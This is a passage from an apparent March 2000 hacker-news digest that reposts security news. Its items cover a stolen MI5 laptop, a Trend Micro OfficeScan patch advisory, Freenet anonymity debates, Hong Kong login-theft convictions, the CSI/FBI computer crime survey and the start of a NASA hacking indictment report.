not to link to. Who would have ever thought of hacking an iMac into a rack-mount? Definitely a cool hardware hack. The iMac Rack-Mount Project http://imac.pointinspace.com/ (Surf to the URL homeboyie! pics and plans available for this kewl hack, someone found a use for the iMac?? - Ed) @HWA 71.0 HNS:Mar 24th:SECRETS STOLEN ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS (Help Net Security) http://www.net-security.org/ by BHZ Friday 24 March 2000 on 5:57 PM British police said today they were hunting a thief who had stolen a secret service computer containing confidential information on Northern Ireland. Link: Yahoo! http://dailynews.yahoo.com/h/nm/20000324/tc/britain_spies_1.html Friday March 24 10:18 AM ET British Intelligence Laptop Stolen at Station LONDON (Reuters) - British police said Friday they were hunting a thief who had stolen a secret service computer containing confidential information on Northern Ireland. The laptop computer was snatched while an employee of Britain's domestic security service, MI5, was buying a ticket at London's Paddington train station. ``I can confirm that a laptop computer was stolen from the security service employee on March 4 at Paddington Underground (station),'' said a government official who declined to be identified. ``The information contained in the laptop was well protected and we believe it to be secure. We are not prepared to discuss the nature of the material.'' The information on the computer was understood to be heavily encrypted and was related to the situation in Northern Ireland, but not to refer to the state of the peace process or any guerrilla threat. A spokesman for Prime Minister Tony Blair said officials were always concerned at the loss of any sensitive material, but they were confident it was secure and that national security had not been threatened. ``We believe this is an opportunistic theft and not a deliberate attempt to gain access to security service information,'' he said. Asked why agents were walking around with security information on computers, the spokesman said there were strict procedures for moving classified material. ``You can certainly say they've been tightened since this incident,'' he added. The Sun newspaper said a squad of 150 police were working around the clock to catch the thief. Before the start of the 1991 Gulf War in Kuwait and Iraq, a laptop said to have contained war plans was stolen from the car of a Royal Air Force officer, who lost his job as a result. The latest theft comes as the peace process in Northern Ireland is in disarray. Last month Britain decided to suspend a fledgling home-rule government over lack of progress on disarmament by Irish Republican Army guerrillas. @HWA 72.0 HNS:Mar 24th:PATCH RELEASED BY TREND MICRO ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS (Help Net Security) http://www.net-security.org/ by BHZ Friday 24 March 2000 on 5:43 PM Trend Micro has released a patch that eliminates server security vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier versions, running on Windows NT 4 server with Internet Information Server(IIS). Link: Bugware http://www.net-security.org/cgi-bin/bugs/fullnews.cgi?newsid953916142,40085, Patch available for OfficeScan vulnerability Posted to BugTraq on March 24, 2000 Security Focus BugTraq ID: 1057 Posted: March 22, 2000 Summary ======= Trend Micro has released a patch that eliminates server security vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier versions, running on Windows NT 4 server with Internet Information Server (IIS). These versions of OfficeScan allow intruders within a firewall to invoke OfficeScan CGIs on the server without authentication - bypassing OfficeScan management console password protection. These OfficeScan CGIs are intended for administrator to manage OfficeScan antivirus running on networked workstations via the OfficeScan management console. By gaining access to execute these CGIs, hackers can use them to change OfficeScan antivirus configurations or to uninstall OfficeScan antivirus on thedesktops. Issues ====== Trend OfficeScan version 3.51 or earlier versions apply inadequate security settings on the OfficeScan server CGI components. If a malicious user, has the ability to connect to the OfficeScan server via a web browser, these CGIs can be executed to send valid commands - including uninstall command - to OfficeScan clients. In addition, OfficeScan's implementation of user authentication in its management console - password protection - was insufficiently encrypted, and allows a malicious user to decrypt and gain access to the OfficeScan management console. Implementation ============== Trend Micro has released a patch that will secure access to the OfficeScan CGIs on the server. The patch program changes the file permissions on the OfficeScan CGIs, so only administrators can access and execute them. This patch works only on drives formatted to use Windows NT file system (NTFS). After applying this patch, hackers will no longer be able to remotely invoke OfficeScan CGIs without being authenticated as a administrator by NTFS security. This patch also prevents hackers, who sniffs for OfficeScan management console password over the network, from gaining access to the OfficeScan management console. Access to the OfficeScan management console or to execute OfficeScan CGIs now requires NTFS authentication. Affected Software Versions ========================== Trend OfficeScan Corporate Edition 3.0 Trend OfficeScan Corporate Edition 3.11 Trend OfficeScan Corporate Edition 3.13 Trend OfficeScan Corporate Edition 3.50 Trend OfficeScan Corporate Edition 3.51 Trend OfficeScan for Microsoft SBS 4.5 This vulnerability is only present when the above software version is installed on a Windows NT server with IIS. It is not present when the above software version is installed on Novell NetWare servers or Windows NT server without IIS. Patch Availability ================== OfficeScan Unauthenticated CGI Usage patch can be downloaded from: http://www.antivirus.com/download/ofce_patch.htm More Information ================ Please see the following references for more information related to this issue. - Trend Micro Security Bulletin: http://www.antivirus.com/download/ofce_patch_351.htm - Frequently Asked Questions: Trend Micro Knowledge Base http://solutionbank.antivirus.com/solutions/faqResult.asp?product=8 Obtaining Support on this Issue =============================== This is a fully supported patch. Information on contacting Trend MicroTechnical Support is available at http://www.trend.com/support/default.htm Acknowledgements ================ Trend Micro thanks Gregory Duchemin http://www.securite-internet.com and Elias Levy http://www.securityfocus.com for reporting the OfficeScan server vulnerability to us, and working with us to protect our customers. @HWA 73.0 HNS:Mar 24th:PRIVACY ISSUES ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 24 March 2000 on 5:32 PM The idea that privacy and security might be symptoms and not the problem emerged from a recent Webmaster focus group discussion with the Office of Personnel Management on defining Webmaster classifications. Link: FCW http://www.fcw.com/fcw/articles/2000/0320/web-dotgov-03-23-00.asp COMMENT Privacy, security on the Web require business know-how FCW's Dot-gov Thursday column BY Rich Kellet 03/23/2000 The idea that privacy and security might be symptoms and not the problem emerged from a recent Webmaster focus group discussion with the Office of Personnel Management on defining Webmaster classifications. We worked through the usual issues of defining technology Webmasters and content Webmasters. As we moved from the discussion of specialists to the issue of World Wide Web managers, an interesting perspective emerged from our discussions. Anecdotes and informal surveys are showing that about half of the Webmaster community works in mission-oriented program offices, which are not information technology organizations. This led to a discussion of the difference between managers in program organizations and managers in technology organizations. Web managers in program organizations tend to be business managers and Web managers in IT organizations tend to be technology managers. The conclusion of this discussion was to define a "breed" of Web manager under an IT series that is a technology manager or "Web technology manager" So, what about the concept of a classification for a Web business manager? I asked the group if anyone knew of a classification for business managers in the federal government. To my surprise, there does not appear to be one. It is important to pause at this point and consider what this means. Individuals who obtain business degrees, undergraduate or higher, have qualifications in an area recognized by the private sector as a unique skill and a profession in its own right. These skills are essential to running large programs that deliver the government�s products and services to the public or other agencies. When I developed the top skill areas that a federal Web manager needs so that the Webmaster can deliver programs online, to my own surprise, most of the required skills originated from business skills, such as accounting and financial management and budgeting. As I looked across government, I found surprisingly little information on what it means to run a business in the federal government context. There is plenty of information on, for instance, project management, but managing a project is not running a business. There is plenty of information on policy, but carrying out policy is not a running business. There is plenty on management, but management skills are not the only skills required to run a business. Courses in small business or college programs in business administration provide samples of the curriculums that define the skills needed to run a business. Running a business over the Web in government is about understanding, integrating and applying principles and processes related to leadership, culture, business processes and components, management, policy, and technology into a functioning organization that delivers a set of products and services to the public or other agencies. The issues of privacy and security are difficult to incorporate into Web sites because they challenge our abilities as business managers. Privacy and security are not "modules" you can buy off the shelf. It is not solely a technology issue, a people issue or a system issue. Privacy and security are "embedded and threaded" throughout the business processes, the organization�s working knowledge and the supporting technology infrastructure. At each level of the architecture and in the operations of the business, people and assets (routers, servers, operating systems and other components) Web masters must incorporate privacy and security concepts and solutions. To solve privacy and security requires a commitment to re-inventing business processes, developing the organization�s business and technology skills, and improving the underlying infrastructure. This is the stuff of a Web business manager. This is far beyond just "plugging holes" in operating systems or applications. Solving privacy and security is an enterprisewide issue that requires Web business leaders working with other business leaders in the agency. With the Web becoming the central construct for delivering products and services, the government is going to need Web business managers. We have many now, and we need to continue to grow this portion of the work force. So, where does that leave us? Not surprisingly, it is a business decision to decide whether to solve these issues by funding them appropriately, to develop business processes that incorporate privacy and security, and to build and continuously improve our organizational knowledge for putting in place privacy and security solutions. We can spend a lot of time on chasing privacy or security holes or solve the problem more efficiently and in less time by looking at the whole business. -- Kellet is founder of the Federal Web Business Council, co-chair of the Federal Webmaster Forum, and is director of GSA�s Emerging IT Policies Division. @HWA 74.0 HNS:Mar 24th:TARGETING ONLINE SCAMMERS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 24 March 2000 on 11:34 AM Law enforcement officials from 27 countries and 45 states have conducted a massive sweep of the Internet searching for "get-rich-quick" schemes and scams, the Federal Trade Commission said Thursday. Link: ZDNet http://mcafee.snap.com/main/page/pcp/cd/0,85,-1715-1085412-303380,00.html Authorities target online scammers By Margaret Kane, ZDNet News 03/23/2000 10:22 Law enforcement officials from 27 countries and 45 states have conducted a massive sweep of the Internet searching for "get-rich-quick" schemes and scams, the Federal Trade Commission said Thursday. More than 1,600 sites were uncovered in the "Get-Rich-Quick.con" program, one of several "surfs" the agency conducted looking for problems and crimes on the Net. The latest sweep hooked up law enforcement officials across state and national borders and involved hundreds of researchers who scoured the Net for scam artists. Many languages, one voice "We want them to know that the borderless Internet marketplace is not a free zone for fraud," said Jodie Bernstein, director of the FTC Bureau of Consumer Protection. "Though we speak different languages on the subject of Internet fraud, we speak with one voice. Our message is: Con artists will not threaten the safety of the Net." 'We're going to run them out of town, and run them off the Web'|Drew Edmondson, Oklahoma attorney general Some of the schemes promised users rewards such as "surf the Net and earn $100 an hour," he said. Authorities also found a variety of pyramid schemes, outrageous product claims and outright fraud. The sites are sent e-mail warnings, and documentation of the sites is provided to law enforcement agencies in the various jurisdictions, which will be able to further investigate and press charges, if necessary. Bernstein said the agencies could begin filing charges in June or July. Calling out the cyberposse "As an old prosecutor I'm looking forward to Phase Two. Once we've investigated, as the old sheriff would do, we're going to run them out of town and run them off the Web," said Drew Edmondson, Oklahoma attorney general. "And where appropriate we'll put them in jail." It came as no surprise to speakers at Thursday's news conference that con artists have migrated onto the Web. About half of the U.S. Postal Service's mail fraud investigations begin as online solicitations, said Lawrence Maxwell, USPS inspector in charge of fraud, prohibited mailings and forfeiture investigations. It's easy for con artists to target consumers "in an age dominated by a 'Who Wants to be a Millionaire' mentality," said Richard Walker, enforcement director for the Securities and Exchange Commission. @HWA 75.0 HNS:Mar 24th:FEARS OF FREENET ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 24 March 2000 on 11:30 AM A report by a British scientific magazine suggests that an anonymous Internet system designed to guarantee free speech online could be used by child pornographers, terrorists and others with less-than-pristine purposes. Link: Computer Currents http://www.currents.net/newstoday/00/03/24/news5.html Daily News Freenet Raises Security Fears By Martin Stone, Newsbytes March 24, 2000 A report by a British scientific magazine suggests that an anonymous Internet system designed to guarantee free speech online could be used by child pornographers, terrorists and others with less-than-pristine purposes. A Reuters report today said a New Scientist magazine article on the Freenet program, which was created by Edinburgh University graduate Ian Clarke and others to make tracing file originators impossible, thereby giving dissidents in countries without free speech a voice, could be misused by those with sinister designs. The report stated that the Internet Watch Foundation, an independent body monitoring Web sites in Britain, fears the decentralized system could make policing the Net and tracking down computer crimes even more difficult. "There is clear potential for misuse by criminals, terrorists and pedophiles," Roger Darlington, chairman of the foundation, told the weekly magazine in its latest issue, Reuters reported. Users of Freenet are difficult to track down because files do not contain a unique Web address and are distributed on computers belonging to Freenet members. To retrieve a file, users enter the key, Reuters said. According to Clarke, a single computer user cannot be held responsible for Freenet files because the originator cannot be traced. "It's perfect machine anarchy," he is quoted as saying. "No single computer is in control." Reported by Newsbytes.com @HWA 75.1 Anonymous net access aiding and abetting online criminals? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: Dragos Ruii url: http://www.wired.com/news/technology/0,1282,34768,00.html Alternative Net Protects Pirates by Leander Kahney 3:00 a.m. 8.Mar.2000 PST Open-source advocates are developing an alternative publishing network that promises to provide true anonymity in sharing documents and files over the Internet. But in addition to protecting free speech, the new system also could be a boon for multimedia pirates. Freenet is an open-source file-transfer system similar to the Web for sharing digital content such as HTML pages and MP3 music files. It will be run by connected clusters of servers or node stations that could in turn be run on almost any PC connected to the Internet. But unlike the Web, Freenet has no centralized administrative infrastructure of domain name servers (DNS) and IP addresses that can be used to track users. Hosting and replicating documents and files requires that Freenet backers volunteer their time and resources. Because Freenet aims to be anonymous, secure, and without centralized control, it would make it almost impossible to trace people who post content -- legal or otherwise -- onto the network. "My primary motivation was to make it very difficult to censor information," said Ian Clarke, an Irish programmer who designed the system. "With the Internet there's the potential to censor and monitor people to a degree that's never been possible before. I wanted to develop the technology to make this impossible." Clarke started work on Freenet 18 months ago as a graduate student in artificial intelligence at Edinburgh University. He had been outraged by the Australian government's proposal to introduce sweeping censorship laws, which went into effect in January. Clarke hopes to launch the first public version in the spring, but he said the system is still pretty rough. The server is nearly finished, but so far there are no browsers, or clients, to make the network easy to use. Freenet software will be released under the GNU public license, which will allow anyone to freely distribute and change the source code. The system is being written in Java by about a dozen programmers internationally. They have never met nor even spoken over the phone -- all communication is by email, Clarke said. Both authors and readers can choose to be anonymous if they so wish, Clarke said. Like the Web, the network is navigated by a client, or browser. He said it will even be difficult to determine if someone is running a Freenet server and what information is being stored on it, Clarke said. Alex Fowler of the Electronic Frontier Foundation said that while he generally supports anti-censorship tools, Freenet could create as many problems as it solves. Fowler said that Freenet could be a useful tool in countries like Singapore or China that censor the Net or quash free speech. But he doesn't like the idea that you wouldn't be able to remove sensitive information -- such as someone's medical records. "There's no way to tell if a project like this will actually take off," he said. "It's certainly going to raise some questions with a whole lot of people. Not just copyright holders, but governments too." Patrick Ball, deputy director of the Science and Human Rights Program with the American Association for the Advancement for Science, said tools like anonymizers, strong cryptography, and Freenet tend not to help activists who are not already under surveillance because using them is in itself suspicious and tends to alert the authorities. "I'm for any application that protects dissidents," he said. "But there's a higher order problem that's very difficult to get around, and that's by using these tools you draw attention to yourself." Although Clarke designed Freenet to protect free speech, he thinks that the safeguards they are building in to make it difficult to track down those who distribute content could lead to its notoriety as a vehicle for copyright piracy. The system was designed to make it impossible to find out where files are physically stored. Information posted to the network is stored on multiple servers simultaneously, making it difficult to remove a file. In fact, Clarke said any attempt to remove information causes it to be copied to other servers on the network. The only way to remove information is to disable the entire network, which may prove difficult if it becomes popular and is running on thousands of PCs all over the globe. However, Clarke said the network cannot be guaranteed to permanently store information. Only popular files survive for any period of time. Older, unpopular files would be overwritten by more popular ones. "As a project we don't want to be labeled as hackers who distribute warez or copyrighted material," he said. "The purpose of Freenet is to promote freedom of information, but there is an inevitable consequence there that it might lead to violation of copyright law." "The potential for protecting freedom of speech is more important than protecting copyright, which is an economic tool," Clarke added. Clark noted that Freenet can be functionally identical to Napster, the wildly popular network for sharing music online. But while the Recording Industry Association of America is currently seeking a court order to shut down Napster's central servers, it would be almost impossible to disable a Freenet network running on machines all over the world. "Because it's decentralized no one can be held responsible for it," Clarke said. "Once it's released there's no point coming after me because there's nothing I, nor anyone else, can do to shut it down." Eric Sheirer, a music technology researcher at MIT's Media Lab, said Freenet is an interesting experiment, but said it would likely be used only by a small community of pirates and "privacy nuts." "If it is adopted, it will be adopted by people who want to exchange illegal information and by people who are rabid about privacy and security, which is a relatively small universe," Sheirer said. Sheirer pointed out that the Web is trustworthy because of the content on certain domains, and he likes the convenience of tracking devices such as cookies that remember log-in names and passwords. "Many of the advantages of Freenet are disadvantages to me," he said. Nonetheless, Sheirer said the advent of Freenet and Gnapster, an open-source clone of Napster, illustrated the need for debate about copyright laws in the age of ubiquitous digital distribution channels. "There are larger questions about the implications of these technologies," Sheirer said. @HWA 76.0 HNS:Mar 24th:FEDERAL CIO NEEDED ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 24 March 2000 on 11:29 AM Former Senate Year 2000 Committee Chairman Sen. Robert Bennett, said Thursday that the numerous legislative and agency efforts to address cyber security may need the guidance of a single "chief information officer" to coordinate the government's cross agency and trans-industry security measures. Link: Computer Currents http://www.currents.net/newstoday/00/03/24/news16.html Federal CIO Needed for Web Security By Brian Krebs, Newsbytes March 24, 2000 Former Senate Year 2000 Committee Chairman Sen. Robert Bennett, R-Utah, said Thursday that the numerous legislative and agency efforts to address cyber security may need the guidance of a single "chief information officer" to coordinate the government's cross agency and trans-industry security measures. Speaking at a US Chamber of Commerce meeting, "Cyber Security: The Real Y2K Challenge," Bennett said that, while it is up to company CEOs to ensure the security of their own Web sites, the federal government can and should provide a overarching structure for that effort. Bennett said the Clinton administration's Critical Infrastructure Assurance Office (CIAO) - the agency charged with coordinating the federal government's cyber security efforts - was a good start, but also highlighted a need for leadership on the issue. "Every company has a chief information officer, and I think eventually the government would need its own CIO, maybe even at the cabinet level position," Bennett said. "But this is not going to happen quickly." Over the past few weeks, a handful of public officials have called for a federal government CIO to coordinate the government's many efforts. Last week before the House Subcommittee on Government Management, Information, and Technology, Chariman Stephen Horn, R-Calif., pointed to the government's many security management players and asked whether there shouldn't be one entity coordinating the government's efforts. "Y2K underscored the need for a disciplined management approach to problem solving," Horn said. "That type of commitment will be equally important as we turn to the second technological challenge of the New Year - computer security." Horn then turned to the witnesses, asking, "Could the Koskinen model work here?" At today's meeting, Bennett told reporters that, regardless of the model Congress ultimately chooses, he has heard from Koskinen himself on the issue. "He told me that with regard to the Critical Infrastructure Protection program: 'You have my very best wishes, but you will do it without me,'" Bennett said. Bennet said the responsibility for protecting the confidentiality and security of corporate information rests squarely on the shoulders of company CEOs, and those who wait for the government to step in with legislative remedies will find their sites hacked and their business secrets revealed. "This is a CEO and survival issue, not something you leave to the techies," he said. "The reality is that if somebody decides they want to break into your company and steal your secrets, they can do that." Bennett urged CEOs in attendance to shift to the mode of urgency and cooperation that made Y2K such a non-event, and emphasized the need for lawmakers and CEOs to take a "horizontal" view of their organization and how weaknesses in their companies' systems can affect other companies on the network. "We're not thinking horizontally enough in Congress and industry," Bennett said. "Nobody's interested in stovepiping: I don't care if your company is secure or not, but I do care if you're connected to the Internet." Bennett said that, given the hectic schedule that Congress is working at this session, it was likely that few of the many proposed bills to address cyber security would pass this year. But, he said, the bills were necessary to keep the dialogue going. Reported by Newsbytes.com, http://www.newsbytes.com . (20000323/WIRES ONLINE, LEGAL, BUSINESS/) (NEWS)(ASIA)(HKG)(00029) Arescom Provides DSL For Chunghwa Telecom 03/23/00 HONG KONG, CHINA, 2000 MAR 23 (NB) -- By Staff, IT Daily. Broadband provider Arescom has recently been awarded a major business contract for 78,000 digital subscriber lines (DSL) in partnership with one of Taiwan's wireless service providers, Tecom. The contract includes the supply and installation of Arescom's NetDSL 800 ADSL (asynchronous DSL) modem/bridge and the NetDSL 1000 IP (Internet Protocol) router. Implementation is expected to start in May and Arescom is partnering with Nokia for DSLAM products. NetDSL 1000 can support up to 253 users through a hub. It has router capabilities already built in. The NetDSL 800 ADSL modem provides Internet access and bridging functions through Ethernet and USB (Universal Serial Bus) interfaces. Reported by Newsbytes.com @HWA 77.0 HNS:Mar 24th:DETERRENT SENTENCES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 24 March 2000 on 1:45 AM Three teenage computer hackers were warned yesterday that they faced deterrent sentences after they admitted selling login names and passwords stolen from the Internet in the first case of its kind in Hong Kong. Link: SCMP http://www.scmp.com/News/HongKong/Article/FullText_asp_ArticleID-20000322020710278.asp Wednesday, March 22, 2000 Teen hackers face deterrent sentences ELAINE PAK LI Three teenage computer hackers were warned yesterday that they faced deterrent sentences after they admitted selling login names and passwords stolen from the Internet in the first case of its kind in Hong Kong. One of the trio, a student, was also convicted of downloading songs from the Internet and selling them for profit. At Eastern Court, restaurant manager Tam Hei-lun and clerk Po Yiu-ming, both 19, and student Mak King-lam, 18, pleaded guilty to a total of 49 charges. Magistrate Ian Candy remanded them in custody for sentencing on April 5, pending reports, and said: "It is precisely these kind of computer crimes which leave Internet users in fear and make them pause before conducting even the most basic of transactions. "These criminal activities should be nipped in the bud and a deterrent sentence must be imposed." All the offences took place between March 1998 and May last year. David Leung, prosecuting, told the court Po had hacked into other Internet users' computers and unlawfully obtained 127 login names and passwords given to Internet users when they subscribe to an Internet service provider for a monthly fee and an hourly rate. The three defendants knew each other through the Internet and Po had sold some of his illegally obtained login names and passwords to Tam for $3,000, but gave others for free to Mak. Tam later resold them for $1,500. The three were aware that the information they obtained was acquired illegally, the magistrate was told. Mr Leung said the three defendants had hacked into the accounts of Internet users of Hongkong Telecom IMS Netvigator, Vision Network Ltd, City Telecom (HK), Netfront Information Technology and ABC Net, saving themselves the monthly fees and causing losses to the account holders. Tam admitted 14 counts of obtaining access to a computer with a view to dishonest gain, Po admitted 12 and Mak two. Mak also admitted 10 charges of selling pirated discs, in which he downloaded songs from the Internet and sold 200 discs from his own Web site. Each disc contained 100 songs and was priced at $88. Tam, who asked buyers of the logins to deposit money into his bank account, also admitted eight counts of dealing with property known or reasonably believed to represent proceeds of an indictable offence. Po admitted a further three charges of criminally damaging the computers of three users. @HWA 78.0 HNS:Mar 23rd:SENSITIVE DATA MADE PUBLIC ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 8:32 PM Consumers who requested online life insurance quotes from the SelectQuote Web site on Tuesday and Wednesday were apparently victimized by a software glitch, which caused their personal information to be left on the company's Web site, wide open. Link: Security Watch http://www.securitywatch.com/scripts/news/list.asp?AID=2324 Insurance site exposes sensitive customers' data (03/23/2000) Consumers who requested online life insurance quotes from the SelectQuote Web site on Tuesday and Wednesday were apparently victimized by a software glitch, which caused their personal information to be left on the company's Web site, wide open. The security glitch in the softwareSelectQuote uses, would have occurred when a form that consumers fill out to request a quote failed to clear the contents at the end of the process. This resulted in all personal information (name, address, current coverage and parents' health histories) from the previous user being plainly exposed to the next person requesting a quote. @HWA 79.0 HNS:Mar 23rd:ALTERING WEB SITES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 5:32 PM A Gore computer business has beefed up its security after a Brazilian hacker got into one of the websites and defaced it. Link: The Press NZ http://www.press.co.nz/2000/12/000323x04.htm Hacker breaches security to alter Alexandra website text By Sonia Gerken A Gore computer business has beefed up its security after a Brazilian hacker got into one of the websites it manages and changed the text. Clive Wilson Computers Gore managing director Ewen Whitefield said yesterday the security breach of its domain hosting machine last month was low level, but "anyone hacking into our machines is serious." The hacker changed text on the website of an Alexandra client. Police had been notified of the breach and the company was unlikely to pursue it further. "It annoys us more than anything else. If it was a major security breach we could chase it back to the United States and Brazil," Mr Whitefield said. If anything the breach proved the company's electronic "firewalls" were pretty good, stopping the hacker from getting any further than minimal damage, he said. Website designer Ken France, of Arthurton, said the hacker probably found a "tiny little hole" to sneak in through. It was an old site, designed two years ago. The breach was annoying and nothing serious - "apart from getting a laugh at our expense," he said. There was a big rush of "hits" to the site after the first hacker got in. Within a week 200 hits more than usual were logged and three or four of those had changed some text, Mr France said. "Some even put their telephone number in. "It was like 'If you want to know how I got in here give me a call'," he said. The company was warned about the hacking by a phone call from someone claiming to be a website watcher in Australia. Mr France said the call came an hour after he had looked at the website and it was all right. "It's quite strange how they knew. I suspect it was bogus." Mr Whitefield said the company received an e-mail the day after the hacking from the Brazilian Internet Society asking questions about the hacker. There was no way to verify the authenticity of the e-mail, he said. Mr France said the company's tighter security had been affective. At times he had been unable to get into sites he designed that were managed by the company. "It's good in a way. If I can't get in, how will anyone else," he said. @HWA 80.0 HNS:Mar 23rd:SECURITY BREACHES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 5:28 PM More than 90 percent of large corporations and government agencies were the victims of computer security breaches in 1999, according to a new survey. Link: APB News http://www.apbnews.com/newscenter/internetcrime/2000/03/22/crimesurvey0322_01.html 9 of 10 Companies Report Computer Attacks Survey Finds Damages Triple as Cybercrime Booms March 22, 2000 By David Noack SAN FRANCISCO (APBnews.com) -- More than 90 percent of large corporations and government agencies were the victims of computer security breaches in 1999, according to a new survey. The Computer Security Institute's fifth Computer Crime and Security Survey also found that the total reported financial losses have tripled. The annual survey is conducted with the participation of the San Francisco FBI Computer Intrusion Squad and aims to increase awareness of security. This year's survey was based on responses from 643 computer-security professionals in U.S. corporations, government agencies, financial institutions, medical institutions and universities. Only 42 percent of those answering the survey could put a dollar figure on their financial losses -- reporting the total at $265 million. The average annual total over the last three years was $120 million. Widespread and diverse Patrice Rapalus, director of the Computer Security Institute, said the survey points to a disturbing trend. "Cybercrimes and other information-security breaches are widespread and diverse," she said. "Ninety percent of respondents reported attacks. Furthermore, such incidents can result in serious damages. ... Clearly, more must be done in terms of adherence to sound practices, deployment of sophisticated technologies, and most importantly, adequate staffing and training of information-security practitioners in both the private sector and government." The survey also found: 70 percent reported a variety of serious computer security breaches other than the most common ones of computer viruses, laptop theft or employee "net abuse." Other examples included theft of proprietary information, financial fraud, system penetration from outsiders, denial of service attacks and sabotage of data or networks. 74 percent acknowledged financial losses due to computer breaches. 71 percent of respondents detected unauthorized access by insiders. For the third year in a row, more respondents -- 59 percent -- cited their Internet connection as a frequent point of attack rather than their internal systems -- 38 percent -- as a frequent point of attack. Financial losses larger The report said the financial losses in eight of 12 categories were larger than in any previous year. In addition, financial losses in four categories were higher than the combined total of the three previous years. For example, 61 respondents quantified losses due to sabotage of data or networks for a total of $27 million. The total financial losses due to sabotage for the previous years combined totaled only $10 million. As in previous years, the most serious financial losses occurred through theft of proprietary information, with 66 respondents reporting losses of $66 million and financial fraud and 53 reporting $55 million in losses. The survey results show that computer crime threats to large corporations and government agencies come from both inside and outside their electronic perimeters, confirming trends found in prior surveys. Bruce J. Gephardt heads the FBI's Northern California office in San Francisco, which covers 15 counties, including Silicon Valley. He said the survey helps him decide how to deploy his forces instead of reacting to computer crises as they occur. Trends and crises "The results of the CSI/FBI survey provide us with valuable data," Gephardt said. "This information not only has been shared with Congress to underscore the need for additional investigative resources on a national level, but [it] identifies emerging crime trends and helps me decide how best to proactively and aggressively assign resources before those 'trends' become 'crises.'" CSI, which was established in 1974, is a San Francisco-based association of information-security professionals. The FBI, responding to an increase in the criminal targeting of major components of information and economic infrastructure systems, has established the National Infrastructure Protection Center (NIPC), which is located at FBI headquarters, and the Regional Computer Intrusion Squads, which are located in selected offices throughout the United States. The NIPC, a joint partnership among federal agencies and private industry, is designed to serve as the government's lead mechanism for preventing and responding to cyberattacks on the nation's infrastructure. The Regional Computer Intrusion Squads investigate violations of the Computer Fraud and Abuse Act, which includes intrusions to public switched networks, major computer network intrusions, privacy violations, industrial espionage, pirated computer software and other crimes. David Noack is an APBnews.com staff writer (david.noack@apbnews.com). @HWA 81.0 HNS:Mar 23rd:ATTACK COSTS RISE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Thursday 23 March 2000 on 3:29 PM In an annual survey issued on Wednesday, the FBI and the San Francisco-based Computer Security Institute showed just how pressing: total verifiable losses in 1999 more than doubled to up to top $265 million, while more than 90 percent of respondents reported detecting some form of security breach. Link: CNNfn http://cnnfn.com/2000/03/22/technology/wires/hackers_losses_wg/ Hacker attack costs rise FBI, CSI: Verifiable losses due to poor security top $265M in 1999 March 22, 2000: 7:30 a.m. ET SAN FRANCISCO (Reuters) - In a year that saw some of the Internet's best known sites seriously hit by hacker attacks, few computer users would question that cyber-security is a pressing concern. In an annual survey issued on Wednesday, the FBI and the San Francisco-based Computer Security Institute showed just how pressing: total verifiable losses in 1999 more than doubled to up to top $265 million, while more than 90 percent of respondents reported detecting some form of security breach. Security experts say a large number of attacks go unrecognized, and the total is hard to assess, with companies reluctant to admit they've been vandalized. But the annual survey gives a clear picture of a worsening problem. "The trends are continuing in the same direction. It's going from bad to worse in terms of threats from the outside, while the threat from the inside doesn't go away," said Richard Power, CSI's editorial director. The fifth annual survey of computer crime and security polled some 640 corporations, banks and government organizations about the state of their computer systems. Only 42 percent of these respondents could put a dollar figure on what the attacks cost them -- but this figure, at $265 million, was more than double the average annual total over the last three years. While the most common threats -- computer viruses, laptop theft, or employee "net abuse" -- continued apace, at least 74 percent of respondents reported more serious security breaches including theft of proprietary information, financial fraud, system penetration by outsiders, data or network sabotage, or "denial of service" attacks designed to take websites out of commission. Information theft and financial fraud caused the most severe financial losses, put at $68 million and $56 million respectively. But "denial of service" attacks, like the ones that temporarily paralyzed Yahoo!, eBay, Buy.com, and several other websites in February, are also a growing problem, Powers said. Losses traced to denial of service attacks were only $77,000 in 1998, and by 1999 had risen to just $116,250. The new survey, which reports on numbers taken before the high-profile February strikes, showed quantified losses up at more than $8.2 million. "The denial of service showed that many sites are way, way understaffed and not adequately secured," Powers said. "Maybe a half a dozen sites were attacked in that attack, and 150 sites were hacked into to launch the attack. There is a widespread insecurity among corporate sites and government sites and the problem is not just technological, it is human. There are not enough people working on it." Bruce Gephardt, in charge of the Federal Bureau of Investigation's northern California office, said the survey revealed how quickly computer security is becoming a major problem faced by law enforcement, and how more staff was needed to fight it. "If the FBI and other law enforcement agencies are to be successful in combating this continually increasing problem, we cannot always be placed in a reactive mode, responding to computer crises as they happen," Gephardt said in a news release. @HWA 82.0 HNS:Mar 23rd:INDICTED FOR HACKING NASA SERVERS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 3:28 PM A suspected computer hacker made his first court appearance Wednesday after being indicted on charges of breaking into computers belonging to NASA and the U.S. departments of energy, defense and transportation, said federal prosecutors. Link: Miami Herald http://www.herald.com/content/today/business/brkdocs/079991.htm Posted at 11:58 p.m. EST Wednesday, March 22, 2000 Man indicted after allegedly hacking into government computers SAN FRANCISCO -- (AP) -- A suspected computer hacker made his first court appearance Wednesday after being indicted on charges of breaking into computers belonging to NASA and the U.S. departments of energy, defense and transportation, said federal prosecutors. Max Ray Butler, 27, of Berkeley was ordered 